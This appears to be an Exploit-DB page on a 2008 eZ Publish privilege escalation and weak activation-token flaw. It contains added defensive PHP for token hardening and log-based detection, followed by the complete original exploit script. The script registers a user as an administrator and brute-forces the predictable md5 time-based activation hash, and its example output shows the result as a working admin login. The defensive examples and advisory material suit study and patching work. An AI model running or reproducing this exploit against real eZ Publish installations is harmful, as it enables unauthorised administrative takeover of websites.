Vendor: eZ Publish
By: s4avrd0w
CVSS: 7.5 (HIGH)
Title: Privilege Escalation and Weak Activation Token
CWE: 264
Product Name: eZ Publish
Affected Version From: 3.5.2006
Affected Version To: 3.9.2002
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

eZ Publish privilege escalation and weak activation token for new user exploit

eZ Publish is vulnerable to privilege escalation combined with a weak activation token for newly registered users. The vulnerability is present in versions >= 3.5.6 and is resolved in 3.9.5, 3.10.1 and 4.0.1. The activation token is derived from the current time and the user's content object id: in version 3.9.2 the vulnerable code is $hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) ) and in version 4.0.1 it is $hash = md5( time() . $user->attribute( 'contentobject_id' ) ). Both inputs are predictable (the registration time is known to within seconds and the object id is a sequential identifier), so the set of possible tokens is small enough to enumerate. The accompanying script eZPublish_create_admin_exploit.php takes the required parameters -u, -p and -s and the optional parameters -e and -t.
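The following PHP is an added example for this page; it is not eZ Publish code and not part of the original exploit listing. It places the token construction quoted above beside a hardened one: a token drawn from the OS CSPRNG, stored only as a hash, and compared in constant time. The timestamp and object id values are constructed for the demonstration (the object id 14 is the value the page's script uses); function names are this example's own.

```php
<?php
// Added example (not eZ Publish code): weak time-derived activation token
// versus a CSPRNG-derived token with hashed storage and constant-time check.

/**
 * The construction quoted on the page: md5(timestamp . contentobject_id).
 * Both inputs are predictable, so the token can be rebuilt by anyone who
 * knows roughly when the account was registered. Shown only for comparison.
 */
function weakActivationHash(int $timestamp, int $contentObjectId): string
{
    return md5($timestamp . $contentObjectId);
}

/**
 * Hardened construction: 32 bytes from the OS CSPRNG (256 bits of entropy),
 * independent of the clock and of any database id. Hex encoding keeps it
 * safe to place in an activation URL.
 */
function strongActivationToken(): string
{
    return bin2hex(random_bytes(32));
}

/**
 * Persist only a hash of the token, so a leaked user table does not hand
 * out usable activation links.
 */
function tokenStorageHash(string $token): string
{
    return hash('sha256', $token);
}

/**
 * Constant-time comparison, so response timing does not reveal how much of
 * a guessed token matched.
 */
function verifyActivationToken(string $presented, string $storedHash): bool
{
    return hash_equals($storedHash, tokenStorageHash($presented));
}

// Demonstration with constructed values.
$registeredAt = 1229194235;   // constructed registration time (the page's example value)
$objectId     = 14;           // constructed object id (the value the page's script uses)

$weak = weakActivationHash($registeredAt, $objectId);
printf("weak token (100 s window -> 100 candidates): %s\n", $weak);

$strong = strongActivationToken();
$stored = tokenStorageHash($strong);
printf("strong token (2^256 candidates):             %s\n", $strong);
printf("verify correct token: %s\n", verifyActivationToken($strong, $stored) ? 'ok' : 'fail');
printf("verify wrong token:   %s\n", verifyActivationToken($weak, $stored) ? 'ok' : 'fail');
```

Two further properties belong with the strong token in a real deployment: an expiry timestamp stored next to the hash, and invalidation of the row on first successful use, so a token is single-use.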

Mitigation:

Upgrade to the latest version of eZ Publish
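Until the upgrade is in place, the attack pattern the page describes (one registration followed by a burst of GET requests to /user/activate/<32 hex chars> from a single source) is easy to spot in the web server log. The PHP below is an added example, not part of the page or of eZ Publish: it parses Apache combined-format lines and flags any client that sends more than a threshold of activation requests within a sliding window. All log lines are constructed in the script; the IP addresses, threshold and window size are this example's assumptions.

```php
<?php
// Added example (not eZ Publish code): detect activation-token guessing in a
// web-server access log. Log lines are constructed below; format is Apache
// "combined".

// Request line of an activation attempt: a 32-hex-char token after /user/activate/.
const ACTIVATE_PATTERN = '#^"(?:GET|HEAD) /user/activate/[0-9a-f]{32}/? HTTP/1\.[01]"#';

/** Parse one combined-format line into ip/time/request/status, or null if malformed. */
function parseLogLine(string $line): ?array
{
    // 203.0.113.7 - - [15/Dec/2008:10:30:35 +0000] "GET /path HTTP/1.1" 200 512 "-" "ua"
    if (!preg_match('#^(\S+) \S+ \S+ \[([^\]]+)\] ("[^"]*") (\d{3})#', $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $ts->getTimestamp(), 'request' => $m[3], 'status' => (int)$m[4]];
}

/**
 * Returns [ip => count] for every client that issued more than $threshold
 * activation requests inside any $windowSeconds period. A legitimate user
 * follows one link; a run of distinct tokens from one source is guessing.
 * Keyed on request volume, not status code, because a failed activation
 * may still return 200 with an error page.
 */
function findActivationBursts(array $lines, int $windowSeconds = 60, int $threshold = 10): array
{
    $byIp = [];
    foreach ($lines as $line) {
        $e = parseLogLine($line);
        if ($e === null || !preg_match(ACTIVATE_PATTERN, $e['request'])) {
            continue;
        }
        $byIp[$e['ip']][] = $e['time'];
    }

    $flagged = [];
    foreach ($byIp as $ip => $times) {
        sort($times);
        $start = 0;                               // left edge of the sliding window
        foreach ($times as $i => $t) {
            while ($t - $times[$start] > $windowSeconds) {
                $start++;
            }
            $inWindow = $i - $start + 1;
            if ($inWindow > $threshold) {
                $flagged[$ip] = $inWindow;
                break;
            }
        }
    }
    return $flagged;
}

// Constructed log: 12 activation attempts in 12 seconds from one address,
// plus one ordinary activation and one unrelated request from another.
$base = 1229326235;   // constructed epoch
$constructedLog = [];
for ($i = 0; $i < 12; $i++) {
    $constructedLog[] = sprintf('203.0.113.7 - - [%s] "GET /user/activate/%s HTTP/1.1" 200 512 "-" "curl"',
        gmdate('d/M/Y:H:i:s O', $base + $i), md5("constructed-$i"));
}
$constructedLog[] = sprintf('198.51.100.5 - - [%s] "GET /user/activate/%s HTTP/1.1" 200 512 "-" "Firefox"',
    gmdate('d/M/Y:H:i:s O', $base + 30), md5('constructed-legit'));
$constructedLog[] = sprintf('198.51.100.5 - - [%s] "GET /index.php HTTP/1.1" 200 2048 "-" "Firefox"',
    gmdate('d/M/Y:H:i:s O', $base + 31));

foreach (findActivationBursts($constructedLog) as $ip => $count) {
    printf("[!] %s: %d activation requests within 60 s, likely token guessing\n", $ip, $count);
}
// Expected on the constructed data: only 203.0.113.7 is reported (11 requests when flagged).
```

The same window logic works on a log shipped to a SIEM; the useful correlation there is a POST to /user/register followed within a minute by the activation burst from the same source, which is the sequence the page's script produces.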

Exploit-DB raw data:

<?php

/*
	eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected >= 3.5.6
	eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

	eZ Publish weak activation token for new user not resolved now (zero-day).
	Vulnerable code in the version 3.9.2:
		$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
	Vulnerable code in the version 4.0.1:
		$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
	
	* tested on version 3.9.2

	usage: 

	# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]

	The options are required:
	 -u Login of the new admin on eZ Publish
	 -p Password of the new admin on eZ Publish
	 -s Target for privilege escalation

	The options are optional:
	 -t Unix timestamp for a date on target eZ Publish server
		This option is required in a case when on a target server incorrect time is established.
		Default is unix timestamp for a date on local computer.
	 -e Email of the new admin on eZ Publish
		Default is anybody@localhost.localhost.

	example:

	# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
	[+] Phase 1 successfully finished
	[+] Use timestamp: 1229194235
	[+] Begin bruteforce...
	....................
	[+] Phase 2 successfully finished

	[+] Exploiting is finished successfully
	[+] Login in system using admin/P@ssw0rd

*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -s Target for privilege escalation

The options are optional:
 -t Unix timestamp for a date on target eZ Publish server
	(default is unix timestamp for a date on local computer)
 -e Email of the new admin on eZ Publish
	(default is anybody@localhost.localhost)

example:

# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished

[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
";
}

function successfully($login,$password)
{
print "
[+] Phase 2 successfully finished

[+] Exploiting is finished successfully
[+] Login in system using $login/$password
";
}

if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array(); 
	foreach ($argv as $arg) { 
		if (strpos($arg, '-') === 0) { 
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
		} 
	}

	if ($ARG[u] && $ARG[p] && $ARG[s])
	{

		if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";

			$post_fields = array(
				'ContentObjectAttribute_data_user_login_30' => $ARG[u],
				'ContentObjectAttribute_data_user_password_30' => $ARG[p],
				'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
				'ContentObjectAttribute_data_user_email_30' => $ARG[e],
				'UserID' => '14',
				'PublishButton' => '1'
			);

		$headers = array(
		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
		    'Referer' => $ARG[s]
		);

		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
		$res_http->addPostFields($post_fields);
		$res_http->addHeaders($headers);
		try {
			if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
    			$response = $res_http->send()->getBody();

			if (eregi("success", $response) || eregi("Fatal error", $response))
			{
				print "[+] Phase 1 successfully finished\n";
				print "[+] Use timestamp: $time\n";
				print "[+] Begin bruteforce...\n";

				for ($i = $time; $i<$time+100; $i++)
				{
					print ".";
					$hash = md5( $i . "14" );
					$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
					$res_http->addHeaders($headers);
					try {
						$response = $res_http->send()->getBody();

						if (eregi("Your account is now activated", $response))
						{
							successfully($ARG[u],$ARG[p]);
							exit(1);
						}


					} catch (HttpException $exception) {
						print "\n[-] Not connected";
						exit(0);
					}
				}
				print "\n[-] Exploit failed";
			}
			else
			{
				print "[-] Exploit failed";
			}

		} catch (HttpException $exception) {

			print "[-] Not connected";
			exit(0);

		}

	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	} 
}

?>

# milw0rm.com [2008-12-15]